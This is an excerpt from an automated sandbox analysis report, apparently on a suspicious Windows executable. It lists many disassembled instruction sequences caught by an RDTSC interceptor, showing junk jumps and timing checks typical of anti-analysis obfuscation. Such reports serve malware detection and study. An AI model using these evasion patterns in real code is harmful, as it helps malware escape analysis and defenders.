            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0547 second address: 53D05DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6193h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F82E84F6199h 0x0000000f nop 0x00000010 pushad 0x00000011 call 00007F82E84F618Ch 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 mov dh, 6Ah 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F82E84F6196h 0x00000026 jmp 00007F82E84F6195h 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr fs:[00000000h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F82E84F6198h 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D05DE second address: 53D05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D05E5 second address: 53D0641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp-18h], esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov cx, di 0x0000000f jmp 00007F82E84F6191h 0x00000014 popad 0x00000015 mov ch, CFh 0x00000017 popad 0x00000018 mov eax, dword ptr fs:[00000018h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F82E84F618Fh 0x00000027 adc si, E86Eh 0x0000002c jmp 00007F82E84F6199h 0x00000031 popfd 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0641 second address: 53D06E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 mov ecx, dword ptr [eax+00000FDCh] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F82E8EDE51Fh 0x00000014 add esi, 47D8AE7Eh 0x0000001a jmp 00007F82E8EDE529h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F82E8EDE520h 0x00000026 sub eax, 73D29178h 0x0000002c jmp 00007F82E8EDE51Bh 0x00000031 popfd 0x00000032 popad 0x00000033 test ecx, ecx 0x00000035 jmp 00007F82E8EDE526h 0x0000003a jns 00007F82E8EDE55Dh 0x00000040 pushad 0x00000041 mov si, C96Dh 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F82E8EDE528h 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D06E0 second address: 53D0761 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e call 00007F82E84F6194h 0x00000013 mov cx, 70F1h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ecx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F82E84F6193h 0x00000023 sub ecx, 3E51795Eh 0x00000029 jmp 00007F82E84F6199h 0x0000002e popfd 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F82E84F618Eh 0x00000036 adc ch, 00000058h 0x00000039 jmp 00007F82E84F618Bh 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0184 second address: 53C01B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F82E8EDE527h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C01B4 second address: 53C01BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C01BA second address: 53C01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C01BE second address: 53C01EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F82E84F618Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F82E84F6197h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C01EF second address: 53C0238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F82E8EDE51Eh 0x00000010 sub esp, 2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F82E8EDE527h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0238 second address: 53C0250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6194h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0250 second address: 53C0254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0254 second address: 53C0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F82E84F618Ch 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0272 second address: 53C0276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0276 second address: 53C027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C027C second address: 53C02AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F82E8EDE527h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C02AE second address: 53C02C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov dx, CE66h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov di, 5FECh 0x00000014 movsx ebx, cx 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C02C6 second address: 53C02CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C02CC second address: 53C02D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0320 second address: 53C032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C032F second address: 53C036B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F82E84F6199h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C036B second address: 53C0371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0371 second address: 53C0377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0488 second address: 53C04AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F82E8EDE522h 0x00000012 pop eax 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C04AE second address: 53C04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C04B2 second address: 53C0504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F82E8EDE521h 0x0000000c sbb ax, 21A6h 0x00000011 jmp 00007F82E8EDE521h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F82E8EDE521h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F82E8EDE51Dh 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0504 second address: 53C0514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F618Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0550 second address: 53C0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0556 second address: 53C055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C055A second address: 53C0593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F82E8EDE51Dh 0x00000015 pop esi 0x00000016 jmp 00007F82E8EDE521h 0x0000001b popad 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0593 second address: 53C0599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0599 second address: 53C059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C059D second address: 53C05A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C05A1 second address: 53C05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F835A47C3F9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F82E8EDE522h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C05C3 second address: 53C0632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F82E84F61C5h 0x0000000f jmp 00007F82E84F6196h 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 jmp 00007F82E84F6190h 0x0000001c jne 00007F8359A94020h 0x00000022 jmp 00007F82E84F6190h 0x00000027 mov ebx, dword ptr [ebp+08h] 0x0000002a jmp 00007F82E84F6190h 0x0000002f lea eax, dword ptr [ebp-2Ch] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov al, dl 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0632 second address: 53C0675 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 44EBh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 42203FDEh 0x00000012 pushfd 0x00000013 jmp 00007F82E8EDE51Fh 0x00000018 and ecx, 624A5C8Eh 0x0000001e jmp 00007F82E8EDE529h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0675 second address: 53C067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C067B second address: 53C067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C067F second address: 53C0683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0683 second address: 53C0734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F82E8EDE526h 0x0000000e xchg eax, esi 0x0000000f jmp 00007F82E8EDE520h 0x00000014 nop 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F82E8EDE51Eh 0x0000001c sbb ax, 8C98h 0x00000021 jmp 00007F82E8EDE51Bh 0x00000026 popfd 0x00000027 movzx ecx, di 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov edi, 18BBCA12h 0x00000032 popad 0x00000033 nop 0x00000034 jmp 00007F82E8EDE529h 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F82E8EDE523h 0x00000043 sbb cx, 8F6Eh 0x00000048 jmp 00007F82E8EDE529h 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0734 second address: 53C0739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0739 second address: 53C073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C07BF second address: 53C0025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 73E73652h 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007F82E84F6195h 0x00000014 je 00007F8359A93FF8h 0x0000001a xor eax, eax 0x0000001c jmp 00007F82E84CF8BAh 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 cmp eax, 00000000h 0x0000002c setne cl 0x0000002f xor ebx, ebx 0x00000031 test cl, 00000001h 0x00000034 jne 00007F82E84F6187h 0x00000036 jmp 00007F82E84F62AAh 0x0000003b call 00007F82ECE42314h 0x00000040 mov edi, edi 0x00000042 jmp 00007F82E84F6190h 0x00000047 xchg eax, ebp 0x00000048 pushad 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F82E84F618Bh 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0025 second address: 53C002B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C002B second address: 53C0031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0031 second address: 53C0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0035 second address: 53C00B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F82E84F6190h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F82E84F618Eh 0x0000001a adc cx, 68D8h 0x0000001f jmp 00007F82E84F618Bh 0x00000024 popfd 0x00000025 mov ax, 538Fh 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F82E84F618Ch 0x00000032 jmp 00007F82E84F6195h 0x00000037 popfd 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F82E84F618Ch 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0143 second address: 53C0B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 jmp 00007F82E8EDE526h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ret 0x0000000e nop 0x0000000f jmp 00007F82E8EDE512h 0x00000011 and bl, 00000001h 0x00000014 movzx eax, bl 0x00000017 lea esp, dword ptr [ebp-0Ch] 0x0000001a pop esi 0x0000001b pop edi 0x0000001c pop ebx 0x0000001d pop ebp 0x0000001e ret 0x0000001f add esp, 04h 0x00000022 mov eax, dword ptr [00A860A4h+ebx*4] 0x00000029 mov ecx, 04B3412Ah 0x0000002e xor ecx, dword ptr [00A860ACh] 0x00000034 add eax, ecx 0x00000036 inc eax 0x00000037 jmp eax 0x00000039 push esi 0x0000003a call 00007F82E8F046E8h 0x0000003f push ebp 0x00000040 push ebx 0x00000041 push edi 0x00000042 push esi 0x00000043 sub esp, 00000284h 0x00000049 mov esi, dword ptr [esp+00000298h] 0x00000050 mov dword ptr [esp+00000268h], 00A88100h 0x0000005b mov dword ptr [esp+00000264h], 0000009Dh 0x00000066 mov dword ptr [esp], 00000000h 0x0000006d mov eax, dword ptr [00A83D58h] 0x00000072 call eax 0x00000074 mov edi, edi 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 call 00007F82E8EDE51Eh 0x0000007e pop ecx 0x0000007f popad 0x00000080 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0B30 second address: 53C0B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6190h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F82E84F6197h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0B5E second address: 53C0B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0B63 second address: 53C0B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 3B09DE38h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0B76 second address: 53C0B7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0B7C second address: 53C0BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F82E84F618Eh 0x0000000b sub ecx, 3F90D898h 0x00000011 jmp 00007F82E84F618Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F82E84F6195h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0BBD second address: 53C0C12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e pushfd 0x0000000f jmp 00007F82E8EDE528h 0x00000014 sbb ecx, 3A2E4C88h 0x0000001a jmp 00007F82E8EDE51Bh 0x0000001f popfd 0x00000020 popad 0x00000021 cmp dword ptr [769B459Ch], 05h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0C12 second address: 53C0C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6199h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0CAE second address: 53C0D3E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F82E8EDE527h 0x00000008 and esi, 6468B6FEh 0x0000000e jmp 00007F82E8EDE529h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 call 00007F835A47339Dh 0x0000001c push 76952B70h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov eax, dword ptr [esp+10h] 0x0000002c mov dword ptr [esp+10h], ebp 0x00000030 lea ebp, dword ptr [esp+10h] 0x00000034 sub esp, eax 0x00000036 push ebx 0x00000037 push esi 0x00000038 push edi 0x00000039 mov eax, dword ptr [769B4538h] 0x0000003e xor dword ptr [ebp-04h], eax 0x00000041 xor eax, ebp 0x00000043 push eax 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 push dword ptr [ebp-08h] 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000054 mov dword ptr [ebp-08h], eax 0x00000057 lea eax, dword ptr [ebp-10h] 0x0000005a mov dword ptr fs:[00000000h], eax 0x00000060 ret 0x00000061 jmp 00007F82E8EDE51Eh 0x00000066 sub esi, esi 0x00000068 pushad 0x00000069 push eax 0x0000006a pushfd 0x0000006b jmp 00007F82E8EDE529h 0x00000070 or ecx, 2D571A96h 0x00000076 jmp 00007F82E8EDE521h 0x0000007b popfd 0x0000007c pop esi 0x0000007d popad 0x0000007e mov dword ptr [ebp-1Ch], esi 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0D3E second address: 53C0D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F82E84F6196h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0A13 second address: 53D0A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F82E8EDE51Bh 0x00000012 pop eax 0x00000013 push edx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0A3D second address: 53D0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6191h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0A52 second address: 53D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0A56 second address: 53D0AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F82E84F618Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F82E84F6190h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov ecx, 1FF16DBDh 0x0000001c pushfd 0x0000001d jmp 00007F82E84F618Ah 0x00000022 add cx, 2998h 0x00000027 jmp 00007F82E84F618Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F82E84F6194h 0x00000036 jmp 00007F82E84F6195h 0x0000003b popfd 0x0000003c call 00007F82E84F6190h 0x00000041 mov cx, BBB1h 0x00000045 pop ecx 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F82E84F6196h 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0AFF second address: 53D0B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0B03 second address: 53D0B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0B09 second address: 53D0B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E8EDE51Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0B1A second address: 53D0B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F82E84F618Dh 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F82E84F618Ch 0x00000018 or ax, 5248h 0x0000001d jmp 00007F82E84F618Bh 0x00000022 popfd 0x00000023 jmp 00007F82E84F6198h 0x00000028 popad 0x00000029 test esi, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F82E84F618Ah 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0B7B second address: 53D0B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0B8A second address: 53D0BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8359A73996h 0x0000000f jmp 00007F82E84F618Eh 0x00000014 cmp dword ptr [769B459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F82E84F6197h 0x00000022 rdtsc
